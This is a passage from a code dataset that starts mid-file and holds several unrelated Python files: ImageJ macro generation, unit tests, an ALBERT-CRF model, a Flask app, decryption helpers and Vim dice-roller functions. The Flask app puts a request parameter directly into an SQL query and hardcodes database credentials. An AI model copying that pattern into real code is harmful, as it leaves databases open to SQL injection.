\r\nd = []\r\nfor l in range(len(f)):\r\n t = f[l].split(\"]\")\r\n d.append(t)\r\n \r\ne = []\r\nfor l in range(len(f)):\r\n h = d[l][0]\r\n e.append(h)\r\n\r\nz = []\r\nfor l in range(len(f)):\r\n ahhh = e[l].replace(\", \", \"_\")\r\n z.append(ahhh)\r\n\r\n\r\n# z = z[gridcols+2:]\r\n# print(z)\r\n# with open('Pilot.txt') as f:\r\n# lines = f.readlines()\r\n \r\n# MainDirectory = lines[0][16:-1]\r\n# MainDirectory = MainDirectory.replace(\"\\\\\",\"/\")\r\n# n = lines[1][-2]\r\n# ImageJMacrosDirectory = lines[2][25:-1]\r\n# ImageJMacrosDirectory = ImageJMacrosDirectory.replace(\"\\\\\",\"/\")\r\n# BatchFileMacrosDirectory = lines[3][23:-1]\r\n# BatchFileMacrosDirectory = BatchFileMacrosDirectory.replace(\"\\\\\",\"/\")\r\n# PathtoFiji = lines[4][14:-1]\r\n# SendToEmail = lines[5][12:-1]\r\n# WorkStationEmail = lines[6][23:-1]\r\n# Password = lines[7][10:-1]\r\n# ProjectName = lines[8][14:-1]\r\n# # gridsize = lines[9][10:]\r\n\r\n# directory = MainDirectory\r\n# path = ImageJMacrosDirectory\r\n# print(z)\r\n# n = gridsize #Number of regions\r\nimport pandas as pd\r\nimport csv\r\n# for j in range(1,n+1):\r\n# PreprocessedMacroLine = 'run(\"Grid/Collection stitching\", \"type=[Filename defined position] order=[Defined by filename ] grid_size_x=3 grid_size_y=3 tile_overlap=10 first_file_index_x=0 first_file_index_y=0 directory=['+'{}'.format(MainDirectory)+'/tif'+ '] file_names=step0_{y}_{x}.tif output_textfile_name=TileConfiguration_Preprocessed.txt fusion_method=[Linear Blending] regression_threshold=0.30 max/avg_displacement_threshold=2.50 absolute_displacement_threshold=3.50 compute_overlap computation_parameters=[Save memory (but be slower)] image_output=[Fuse and display]\");'\r\n \r\nL2 = []\r\nfor j in range(1,v+1):\r\n for i in range(len(z)):\r\n L1 = '''open(\"/BlN/step{}_{}.BlN_crop.tif\");'\r\n 'selectWindow(\"step{}_{}.BlN_crop.tif\");'''.format(j,z[i],j,z[i])\r\n L2.append(L1)\r\n\r\n# path = r'C:\\Users\\repha\\Documents\\Grad School\\Research\\Scripts\\SEM-DIC\\Works on Marshawn'\r\nL19 = 'run(\"Images to Stack\", \"name=Stack title=[] use\");' #Giving Error in Batch\r\n\r\nL20 = 
'//run(\"Brightness/Contrast...\");'\r\nL2.append(L19)\r\nL2.append(L20)\r\nSad = np.array(L2, dtype=object)\r\nHappy = pd.Series(Sad)\r\nConfused = pd.DataFrame(Happy).replace(' ',' ')\r\n# Confused.to_csv(path+'/Test.ijm', float_format=None, index=False, mode ='w', header=False, sep='\\t', quoting=csv.QUOTE_NONE, escapechar = '\\t')\r\n","repo_name":"AlloyinIllinoisan/DIC-SEM","sub_path":"Automation_at_its_finest/Good to Go/Creates_Grid.py","file_name":"Creates_Grid.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11108781611","text":"import pytest\n\nfrom werkzeug.datastructures import FileStorage\nfrom lib.py3rumcajs.helpers.file_processing import (validate_file,\n validate_extension,\n validate_by_1stline,\n parse_to_dict,\n )\n\n\ndef test_validate_file(testfile, test_stuff_path):\n filepath = test_stuff_path + testfile\n with open(filepath, 'r') as fp:\n file = FileStorage(fp)\n assert validate_file(file) == True\n\n\ndef test_validate_file_extension(testfile, test_stuff_path):\n filepath = test_stuff_path + testfile\n with open(filepath, 'r') as fp:\n file = FileStorage(fp)\n assert validate_extension(file) == True\n\n\ndef test_validate_by1stline(testfile, test_stuff_path):\n filepath = test_stuff_path + testfile\n with open(filepath, 'r') as fp:\n file = FileStorage(fp)\n assert validate_by_1stline(file) == True\n\n\ndef test_validate_file_by_regex_fail(fail_testfile, test_stuff_path):\n filepath = test_stuff_path + fail_testfile\n with open(filepath, 'r') as fp:\n file = FileStorage(fp)\n assert validate_file(file) == False\n\n\ndef test_parse(testfile, test_stuff_path):\n data = parse_to_dict(testfile)\n assert data['data'] != []\n assert data['name'] == testfile\n assert type(data['y_prefix']) == str\n assert type(data['x_prefix']) == str\n\n\n@pytest.mark.skip(reason=\"no implemented feture yet\")\ndef test_rescale_data():\n raise\n","repo_name":"n0npax/turbo-rumcajs","sub_path":"lib/py3rumcajs/tests/helpers/test_file_processing.py","file_name":"test_file_processing.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72396135873","text":"#\n# Plugin load tests for eggs\n#\n\nimport os\nimport sys\nfrom os.path import abspath, dirname\ncurrdir = dirname(abspath(__file__)) + os.sep\n\nimport pyutilib.th as unittest\nimport pyutilib.subprocess\n\ntry:\n import pkg_resources\n pkg_resources_avail = True\nexcept ImportError:\n pkg_resources_avail = False\ntry:\n import yaml\n yaml_available = True\nexcept ImportError:\n yaml_available = False\n\n\n@unittest.skipIf(not pkg_resources_avail, \"Cannot import 'pkg_resources'\")\nclass Test(pyutilib.th.TestCase):\n\n def test_egg1(self):\n #\n # Load an egg for the 'project1' project.\n # Eggs are loaded in the 'eggs1' directory, but only the Project1 stuff is actually imported.\n #\n pyutilib.subprocess.run(\n [sys.executable, currdir + os.sep + \"egg1.py\", currdir, \"json\"])\n self.assertMatchesJsonBaseline(currdir + \"egg1.out\",\n currdir + \"egg1.jsn\")\n if yaml_available:\n pyutilib.subprocess.run(\n [sys.executable, currdir + os.sep + \"egg1.py\", currdir, \"yaml\"])\n self.assertMatchesYamlBaseline(currdir + \"egg1.out\",\n currdir + \"egg1.yml\")\n\n def test_egg2(self):\n #\n # Load an egg for the 'project1' project.\n # Eggs are loaded in the 'eggs1' and 'eggs2' directories, but only the \n # Project1 and Project 3 
stuff is actually imported.\n #\n pyutilib.subprocess.run(\n [sys.executable, currdir + os.sep + \"egg2.py\", currdir, \"json\"])\n self.assertMatchesJsonBaseline(currdir + \"egg2.out\",\n currdir + \"egg2.jsn\")\n if yaml_available:\n pyutilib.subprocess.run(\n [sys.executable, currdir + os.sep + \"egg2.py\", currdir, \"yaml\"])\n self.assertMatchesYamlBaseline(currdir + \"egg2.out\",\n currdir + \"egg2.yml\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"PyUtilib/pyutilib","sub_path":"pyutilib/component/loader/tests/test_egg.py","file_name":"test_egg.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"61"} +{"seq_id":"6970889050","text":"import csv\n\n\ndef main():\n INUMBER_INDEX = 0\n students_dict = read_dict(\"students.csv\", INUMBER_INDEX)\n print(students_dict)\n search = str(input(\"Please enter an I-Number (xxxxxxxxx): \"))\n print (students_dict.get(search,'No such student.'))\n\n\ndef read_dict(filename, key_column_index):\n \"\"\"Read the contents of a CSV file into a compound\n dictionary and return the dictionary.\n\n Parameters\n filename: the name of the CSV file to read.\n key_column_index: the index of the column\n to use as the keys in the dictionary.\n Return: a compound dictionary that contains\n the contents of the CSV file.\n \"\"\"\n dictionary = {}\n with open(filename, \"rt\") as csv_file:\n reader = csv.reader(csv_file)\n next(reader)\n for row_list in reader:\n if len(row_list) != 0:\n key = row_list[key_column_index]\n dictionary[key] = row_list[1]\n return dictionary\n\nif __name__ == \"__main__\":\n main()","repo_name":"emfernandezv/BYU-Idaho-School-Work","sub_path":"CSE111 Programming with Functions/students.py","file_name":"students.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32216703265","text":"import torch\nimport torch.nn as nn\nfrom torchcrf import CRF\nfrom transformers import BertTokenizer, AlbertModel, AlbertConfig\nimport sys\n\nsys.path.append('/home/sy/project/albert_srl/')\n\nfrom utils.log import logger\n\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef load_tokenizer(model_path, special_token):\n logger.info('loading tokenizer {}'.format(model_path))\n tokenizer = BertTokenizer.from_pretrained(model_path)\n if special_token:\n tokenizer.add_special_tokens(special_token)\n return tokenizer\n\ndef load_config(pretrained_model_path, tokenizer):\n albertConfig = AlbertConfig.from_pretrained(pretrained_model_path,\n cls_token_id=tokenizer.cls_token_id,\n sep_token_id=tokenizer.sep_token_id,\n pad_token_id=tokenizer.pad_token_id,\n unk_token_id=tokenizer.unk_token_id,\n output_attentions=False, # whether or not return [attentions weights]\n output_hidden_states=False) # whether or not return [hidden states]\n return albertConfig\n\ndef load_pretrained_model(pretrained_model_path, tokenizer, special_token):\n logger.info('loading pretrained model {}'.format(pretrained_model_path))\n albertConfig = load_config(pretrained_model_path, tokenizer)\n model = AlbertModel.from_pretrained(pretrained_model_path, config=albertConfig)\n\n if special_token:\n # resize special token\n model.resize_token_embeddings(len(tokenizer))\n\n return model, albertConfig\n\ndef build_model(albertConfig):\n logger.info('build albertmodel!')\n model = AlbertModel(config=albertConfig)\n return model\n\nclass AlbertCrf(nn.Module):\n 
def __init__(self, config, pretrained_model, tag_num):\n super(AlbertCrf, self).__init__()\n self.config = config\n self.model = pretrained_model\n self.dropout = nn.Dropout(self.config.hidden_dropout_prob)\n self.classifier = nn.Linear(self.config.hidden_size + 1, tag_num) # add predicates indicator\n self.crf = CRF(num_tags=tag_num, batch_first=True)\n\n def loss(self, input_idx, token_type_ids=None, attention_mask=None, predicates=None, labels=None, label_mask=None):\n outputs = self.model(input_ids=input_idx, attention_mask=attention_mask, token_type_ids=token_type_ids)\n sequence_output = outputs[0]\n sequence_output = torch.cat((sequence_output, predicates.unsqueeze(-1)), -1)\n sequence_output = self.dropout(sequence_output)\n logits = self.classifier(sequence_output)\n # outputs = (logits,)s\n loss = self.crf(emissions=logits, tags=labels, mask=label_mask.byte())\n # outputs = (-1 * loss,) + outputs\n # return outputs # (loss), scores\n return loss\n\n def forward(self, input_idx, token_type_ids=None, attention_mask=None, predicates=None, label_mask=None):\n outputs = self.model(input_ids=input_idx, attention_mask=attention_mask, token_type_ids=token_type_ids)\n sequence_output = outputs[0]\n sequence_output = torch.cat((sequence_output, predicates.unsqueeze(-1)), -1)\n sequence_output = self.dropout(sequence_output)\n logits = self.classifier(sequence_output)\n tags = self.crf.decode(emissions=logits, mask=label_mask.byte())\n return tags\n\n","repo_name":"jiangnanboy/albert_srl","sub_path":"srl/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"70929860035","text":"class Retangulo:\n def __init__(self, ladoA, ladoB):\n self.ladoA = ladoA\n self.ladoB = ladoB\n self.area = self.ladoA*self.ladoB\n self.perimetro = 2*self.ladoA + 2*self.ladoB\n\n def mudaLados(self, ladoA, ladoB):\n self.ladoA = ladoA\n self.ladoB = ladoB\n self.area = ladoA*ladoB\n self.perimetro = 2*ladoA + 2*ladoB\n \n def retornaLadoA(self):\n return self.ladoA\n \n def retornaLadoB(self):\n return self.ladoB\n \n def calculaArea(self):\n self.area = self.ladoA*self.ladoB\n return self.area\n \n def calculaPerimetro(self):\n self.perimetro = 2*self.ladoA + 2*self.ladoB\n return self.perimetro\n\na = float(input(print(\"Digite o primeiro lado:\")))\nb = float(input(print(\"Digite o segundo lado:\")))\nobjeto = Retangulo(a, b)\nif (objeto.area % 2 == 0):\n pisos = objeto.area//2 #pisos de 2 m²\nelse:\n pisos = objeto.area//2 + 1\nif (objeto.perimetro % 4 == 0):\n rodapes = objeto.perimetro//4 #rodapés de 4 m\nelse:\n rodapes = objeto.perimetro//4 + 1\nprint(\"Quantidade de pisos: %d\"%(pisos))\nprint(\"Quantidade de rodapés: %d\"%(rodapes))","repo_name":"leotanaka4/LP-21.2","sub_path":"Classes/Classes03.py","file_name":"Classes03.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33701736591","text":"from flask import Flask, send_file, render_template, jsonify, request\nfrom flask_cors import CORS\nimport pandas as pd\nimport os\nimport psycopg2\nimport sqlalchemy as sa\nfrom db_setup import setup\n\nengine = sa.create_engine('postgresql://docker:docker@postgres:5432/default')\napp = Flask(__name__, template_folder='templates')\nCORS(app)\n\n@app.route('/')\ndef home():\n rows = pd.read_sql(\"select count(*) from bus\", engine).iloc[0]['count']\n return 
render_template('index.html', rows = rows)\n\n@app.route('/speed')\ndef getSpeed():\n route_id = request.args.get('route_id')\n if not route_id:\n route_id = 'B41'\n\n date = request.args.get('date')\n start_time = request.args.get('start')\n end_time = request.args.get('end')\n\n bus_positions_B41 = pd.read_sql(f\"\"\"\n select timestamp, trip_id, longitude, latitude from bus \n where route_id = '{route_id}' \n \"\"\", engine)\n\n bus_positions_B41['timestamp'] = pd.to_datetime(bus_positions_B41['timestamp'])\n\n\n return jsonify(bus_positions_B41.to_dict(orient = 'records'))\n\nif __name__ == '__main__':\n setup(engine)\n port = int(os.environ.get('PORT', 5000))\n app.run(debug=True, host='0.0.0.0', port=port)","repo_name":"zhik/flask_sample","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71125141635","text":"from views import RegressionWidget,RegressionConfWidget,PredictionWidget\r\nfrom model.infrastructure.observer import Observer\r\nfrom .PredictionController import PredictionController\r\nfrom .RegressionConfController import RegressionConfController\r\nfrom .ClassifierWorker import ClassifierWorker\r\nfrom model.Classifier import Classifier\r\nclass RegressionController(Observer):\r\n def __init__(self,model,view):\r\n super().__init__(model)\r\n self.model=model\r\n self.view=view\r\n self.classifier=Classifier(self.model)\r\n #Agregando widget de configuración\r\n self.conf=RegressionConfWidget(self.view)\r\n self.ctl_conf=RegressionConfController(self.model,self.conf,self.classifier)\r\n self.view.widget_list.addWidget(self.conf)\r\n #Agregando widget de predicción\r\n self.prediction=PredictionWidget(self.view)\r\n self.ctl_prediction=PredictionController(self.model,self.prediction,self.classifier)\r\n self.view.widget_list.addWidget(self.prediction)\r\n\r\n self.view.widget_list.setCurrentIndex(0)\r\n self.bind_signals()\r\n\r\n def bind_signals(self):\r\n self.conf.btn_calcular.pressed.connect(self.show_prediction)\r\n self.conf.btn_calcular.pressed.connect(self.ctl_prediction.set_dependiente)\r\n self.prediction.btn_conf.pressed.connect(self.show_conf)\r\n\r\n def show_conf(self):\r\n self.view.widget_list.setCurrentIndex(0)\r\n self.conf.scroll.verticalScrollBar().setValue(0)\r\n\r\n def show_prediction(self):\r\n self.view.widget_list.setCurrentIndex(1)\r\n self.prediction.scroll.verticalScrollBar().setValue(0)\r\n\r\n def end_loading(self,int):\r\n self.view.loaded.emit(40)\r\n\r\n def notify(self,model,*args,**kwargs):\r\n self.view.widget_list.setCurrentIndex(0) #Se debe recalcular el modelo\r\n if len(self.model.num_cols)>1 and len(self.model.objects)>0:\r\n self.ctl_conf.set_model()\r\n self.ctl_prediction.set_model()\r\n self.view.scrollArea.show()\r\n else:\r\n print(\"No tiene datos númericos\")\r\n self.view.scrollArea.hide()\r\n self.end_loading(100)\r\n","repo_name":"elagabalus01/myner","sub_path":"src/controllers/Regression/RegressionController.py","file_name":"RegressionController.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27590430436","text":"import os\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nimport PySimpleGUI as sg\nfrom cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305\nfrom cryptography.fernet import Fernet, InvalidToken\nfrom 
cryptography.hazmat.primitives.ciphers.aead import AESGCM\n\n\ndef fernetDecrypt(input_file, key, output_file):\n with open(input_file, 'rb') as f:\n data = f.read()\n\n actualdata = data[16:]\n fernet = Fernet(key)\n\n # output_file = f\"Dec-{input_file}\"\n\n try:\n\n decrypted = fernet.decrypt(actualdata)\n\n with open(output_file, 'wb') as f:\n f.write(decrypted)\n\n except:\n print(\"Invalid Key\")\n sg.popup('INVALID KEY')\n\n\ndef aesDecrypt(data, key, output_file):\n print(\"AES-CBC DECRYPTION\")\n actualdata = data[16:-16]\n iv = data[-16:]\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv))\n decryptor = cipher.decryptor()\n try:\n decrypted = decryptor.update(actualdata) + decryptor.finalize()\n with open(output_file, 'wb') as f:\n f.write(decrypted)\n print(\"AES-CBC DECRYPTION SUCCESSFUL\")\n except:\n print(\"INVALID KEY\")\n sg.popup('INVALID KEY')\n\n\ndef chacha20poly1305Decrypt(data, key, aad, output_file):\n print(\"Chacha Decrypt\")\n nonce = data[-12:]\n actualdata = data[16:-12]\n chacha = ChaCha20Poly1305(key)\n try:\n decrypted = chacha.decrypt(nonce, actualdata, aad)\n with open(output_file, 'wb') as f:\n f.write(decrypted)\n print(\"Chacha Decryption Successful\")\n except:\n print(\"EITHER INVALID KEY OR INVALID ASSOCIATED DATA\")\n sg.popup('EITHER INVALID KEY OR INVALID ASSOCIATED DATA')\n\n\ndef aesgcmDecrypt(data, key, aad, output_file):\n print(\"AES-GCM DECRYPTION\")\n aesgcm = AESGCM(key)\n nonce = data[-12:]\n actualdata = data[16:-12]\n try:\n decrypted = aesgcm.decrypt(nonce, actualdata, aad)\n with open(output_file, 'wb') as f:\n f.write(decrypted)\n print(\"AES-GCM DECRYPTION SUCCESSFUL\")\n except:\n print(\"EITHER INVALID KEY OR INVALID ASSOCIATED DATA\")\n sg.popup('EITHER INVALID KEY OR INVALID ASSOCIATED DATA')\n\n\ndef tdesDecrypt(data, key, output_file):\n print(\"Triple DES DECRYPTION\")\n actualdata = data[16:-8]\n iv = data[-8:]\n cipher = Cipher(algorithms.TripleDES(key), modes.CBC(iv))\n decryptor = cipher.decryptor()\n try:\n decrypted = decryptor.update(actualdata) + decryptor.finalize()\n with open(output_file, 'wb') as f:\n f.write(decrypted)\n print(\"Triple DES DECRYPTION SUCCESSFUL\")\n except:\n print(\"INVALID KEY\")\n sg.popup('INVALID KEY')\n","repo_name":"ayaachi-jha/encrypty","sub_path":"utils/SymmetricDecryption.py","file_name":"SymmetricDecryption.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39539805874","text":"import re\nfrom typing import Callable\nimport streamlit as st\nimport sys\nfrom streamlit import cli as stcli\n\n\ninterface_input = Callable[[], str]\ninterface_output = Callable[[str], None]\n\n\ndef CLI_input() -> str:\n \"\"\"Implement Command Line Interface Input\"\"\"\n url = input(\"Enter the youtube video URL:\")\n while not re.search(r\"^https:.+=.{3,}$\", url):\n url = input(\"Enter the youtube video URL:\")\n return url\n\n\ndef CLI_output(filename: str) -> None:\n \"\"\"Implement Command Line Interface Output\"\"\"\n print(f\"Wordcloud saved as {filename}\")\n\n\ndef streamlit_input() -> str:\n \"\"\"Implement Streamlit Interface Input\"\"\"\n if st._is_running_with_streamlit:\n st.title(\"Generate a Wordcloud from a youtube video\")\n url = st.text_input(\"Enter the youtube video URL\")\n if not re.search(r\"^https:.+=.{3,}$\", url):\n st.write(\"Enter a youtube video URL\")\n else:\n st.write(\"Processing\")\n return url\n else:\n sys.argv = [\"streamlit\", \"run\", sys.argv[0]]\n 
sys.exit(stcli.main())\n\n\ndef streamlit_output(filename: str) -> None:\n    \"\"\"Implement Streamlit Interface Output\"\"\"\n    st.write(f\"Done. Wordcloud saved as {filename}\")\n    st.image(filename)\n","repo_name":"Guillaume-Fgt/Wordcloud_Youtube","sub_path":"wordcloud_youtube/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26588375788","text":"#Arithmetic operators\nx = 5\ny = 2\nprint ( \"x ** y = {0}\".format( x ** y) )\nprint ( \"x / y = {0}\".format( x / y) )\nprint ( \"x // y = {0}\".format( x // y) )\n#ceil\n\n\n#Assignment operators\nx = 4\ny = 3\nprint ('4 & 3 = {0}'.format(4 & 3))\n\nx = 5\ny = 3\nprint ('5 & 3 = {0}'.format(5 & 3))\n\n\n\nprint ( \"x ^ y = {0}\".format( x ^ y) ) # exclusive OR\n\n#logical operators\nx= 5\ny=10\nz=15\n\nif not(x > y):\n    print(\"NOT succeeded...\")\n\nx ='a'\ny='b'\nz='a'\n\nif x is z:\n    print(\"x and z are same\")\n\nif x is not y:\n    print(\"x is not y\")\n\nx = 10\nx+=10 # x = x+ 10\n\nx = 13\nprint(\"x = 13, value = {0}\".format(x))\nx >>=1\nprint(\"x >>=1, value = {0}\".format(x))\nx >>=1\nprint(\"x >>=1, value = {0}\".format(x))\n","repo_name":"hencilpeter/DataEngineering","sub_path":"BigData/PythonSamples/10_Operators.py","file_name":"10_Operators.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70054833155","text":"from compas_cem.optimization.parameters import NodeParameter\n\n\n__all__ = [\"OriginNodeXParameter\",\n           \"OriginNodeYParameter\",\n           \"OriginNodeZParameter\"]\n\n# ------------------------------------------------------------------------------\n# Origin Node Parameter on X\n# ------------------------------------------------------------------------------\n\n\nclass OriginNodeXParameter(NodeParameter):\n    \"\"\"\n    Sets the X coordinate of an origin node as an optimization parameter.\n    \"\"\"\n    def __init__(self, key=None, bound_low=None, bound_up=None):\n        super(OriginNodeXParameter, self).__init__(key, bound_low, bound_up)\n        self._attr_name = \"x\"\n\n# ------------------------------------------------------------------------------\n# Origin Node Parameter on Y\n# ------------------------------------------------------------------------------\n\n\nclass OriginNodeYParameter(NodeParameter):\n    \"\"\"\n    Sets the Y coordinate of an origin node as an optimization parameter.\n    \"\"\"\n    def __init__(self, key=None, bound_low=None, bound_up=None):\n        super(OriginNodeYParameter, self).__init__(key, bound_low, bound_up)\n        self._attr_name = \"y\"\n\n# ------------------------------------------------------------------------------\n# Origin Node Parameter on Z\n# ------------------------------------------------------------------------------\n\n\nclass OriginNodeZParameter(NodeParameter):\n    \"\"\"\n    Sets the Z coordinate of an origin node as an optimization parameter.\n    \"\"\"\n    def __init__(self, key=None, bound_low=None, bound_up=None):\n        super(OriginNodeZParameter, self).__init__(key, bound_low, bound_up)\n        self._attr_name = \"z\"\n\n# ------------------------------------------------------------------------------\n# Main function\n# ------------------------------------------------------------------------------\n\n\nif __name__ == \"__main__\":\n\n    from compas.geometry import Point\n\n    from compas_cem.diagrams import TopologyDiagram\n\n    from compas_cem.elements import Node\n    from compas_cem.elements import 
TrailEdge\n    from compas_cem.elements import DeviationEdge\n\n    from compas_cem.loads import NodeLoad\n\n    from compas_cem.supports import NodeSupport\n\n    from compas_cem.equilibrium import static_equilibrium\n\n    from compas_cem.optimization import Optimizer\n    from compas_cem.optimization import DeviationEdgeParameter\n    from compas_cem.optimization import TrailEdgeParameter\n\n    from compas_cem.optimization import PointConstraint\n\n    from compas_cem.plotters import Plotter\n\n    # create a topology diagram\n    topology = TopologyDiagram()\n\n    # add nodes\n    topology.add_node(Node(0, [0.0, 0.0, 0.0]))\n    topology.add_node(Node(1, [1.0, 0.0, 0.0]))\n    topology.add_node(Node(2, [2.0, 0.0, 0.0]))\n    topology.add_node(Node(3, [3.0, 0.0, 0.0]))\n\n    # add edges with negative values for a compression-only structure\n    topology.add_edge(TrailEdge(0, 1, length=-1.0))\n    topology.add_edge(DeviationEdge(1, 2, force=-1.0))\n    topology.add_edge(TrailEdge(2, 3, length=-1.0))\n\n    # add supports\n    topology.add_support(NodeSupport(0))\n    topology.add_support(NodeSupport(3))\n\n    # add loads\n    topology.add_load(NodeLoad(1, [0.0, -1.0, 0.0]))\n    topology.add_load(NodeLoad(2, [0.0, -1.0, 0.0]))\n\n    # calculate equilibrium\n    topology.build_trails()\n    form = static_equilibrium(topology)\n\n    # optimization\n    optimizer = Optimizer()\n\n    optimizer.add_parameter(OriginNodeYParameter(1, 1.0, 1.0))\n    optimizer.add_parameter(DeviationEdgeParameter((1, 2), 1.0, 1.0))\n    optimizer.add_parameter(TrailEdgeParameter((2, 3), 1.0, 1.0))\n\n    point_a = Point(1.0, -0.5, 0.0)\n    optimizer.add_constraint((PointConstraint(1, point_a)))\n\n    point_b = Point(3.0, -0.707, 0.0)\n    optimizer.add_constraint((PointConstraint(3, point_b)))\n\n    # optimize\n    eps = 1e-6\n    cform = optimizer.solve(topology, \"LBFGS\", eps=eps, verbose=True)\n    assert optimizer.penalty <= eps\n\n    # plot\n    plotter = Plotter()\n\n    plotter.add(form)\n    plotter.add(point_b, facecolor=(0, 1, 0))\n    plotter.add(point_a, facecolor=(1, 0, 0))\n    plotter.add(cform, show_edgetext=True, edgetext=\"forcelength\")\n\n    plotter.zoom_extents()\n    plotter.show()\n","repo_name":"arpastrana/compas_cem","sub_path":"src/compas_cem/optimization/parameters/origin.py","file_name":"origin.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"61"} +{"seq_id":"33006247723","text":"\"\"\"\nMost functions in here when used in vim, expect vim functions to have argument named args\n\"\"\"\n\nimport rpgdieroller.dierolls as rpgroller\nimport rpgdieroller.oracles as oracles\nimport vim\nimport sys\n\n\ndef _helper():\n    args = vim.eval(\"a:args\")\n    print(args)\n    rpgroller.disable_term_formatting()\n    cur_col = vim.current.window.cursor[0]\n    return args, cur_col\n\n\ndef _update_cursor(shift):\n    pos = vim.current.window.cursor\n    pos = (pos[0] + shift, pos[1])\n    vim.current.window.cursor = pos\n\n\ndef roll():\n    args, cur_col = _helper()\n    lines = []\n    lines.append(\"# Dice Roll:\")\n    lines.append(\"# \" + rpgroller.dierollexpr(args))\n    vim.current.buffer.append(lines, cur_col)\n    _update_cursor(len(lines))\n\n\ndef rollcountsuccess():\n    args, cur_col = _helper()\n    arglist = args.split(\" \")\n    if len(arglist) != 3:\n        print(\n            f\"Error: must use 3 int arguments: <n_dice> <n_sides> <n_for_success>\",\n            file=sys.stderr,\n        )\n        return\n    n_dice = arglist[0]\n    n_sides = arglist[1]\n    n_for_success = arglist[2]\n    try:\n        n_dice = int(n_dice)\n    except ValueError:\n        print(\n            f\"Error: 1st arg n_dice must be convertable to int, not '{n_dice}'\",\n            file=sys.stderr,\n        )\n        return\n    try:\n        
n_sides = int(n_sides)\n except ValueError:\n print(\n f\"Error: 1st arg n_sides must be convertable to int, not '{n_sides}'\",\n file=sys.stderr,\n )\n return\n try:\n n_for_success = int(n_for_success)\n except ValueError:\n print(\n f\"Error: 1st arg n_for_success must be convertable to int, not '{n_for_success}'\",\n file=sys.stderr,\n )\n return\n rpgroller.disable_term_formatting()\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Count Successful Die Rolls:\")\n lines.append(\"# \" + rpgroller.rollcountsuccess(n_dice, n_sides, n_for_success))\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef rollfate():\n args, cur_col = _helper()\n lines = []\n lines.append(\"# Fate Dice Roll:\")\n lines.append(\"# \" + rpgroller.fateroll(args))\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef ironswornaction():\n args, cur_col = _helper()\n lines = []\n lines.append(\"# Ironsworn Action Roll:\")\n lines.append(\"# \" + rpgroller.ironswornaction(args))\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef ironswornprogress():\n n_progress = vim.eval(\"a:args\")\n print(n_progress)\n try:\n n_progress = int(n_progress)\n except ValueError:\n print(\n f\"Error: argument must be convertable to a single int not '{n_progress}'\",\n file=sys.stderr,\n )\n return\n rpgroller.disable_term_formatting()\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn Progress Roll:\")\n lines.append(\"# \" + rpgroller.ironswornprogress(n_progress))\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef OracleYesNo():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Simple oracle roll:\")\n lines.append(\"# \" + oracles.OracleYesNo())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornPayThePrice():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn pay the price:\")\n lines.append(\"# \" + oracles.IronswornPayThePrice())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornCharacterOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn character oracle:\")\n lines.append(\"# \" + oracles.IronswornCharacter())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornActionThemeOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn action-theme oracle:\")\n lines.append(\"# \" + oracles.IronswornActionTheme())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornLocationOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn location oracle:\")\n lines.append(\"# \" + oracles.IronswornLocation())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornSettlementOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn settlement oracle:\")\n lines.append(\"# \" + oracles.IronswornSettlement())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornCombatActionOracle():\n cur_col = 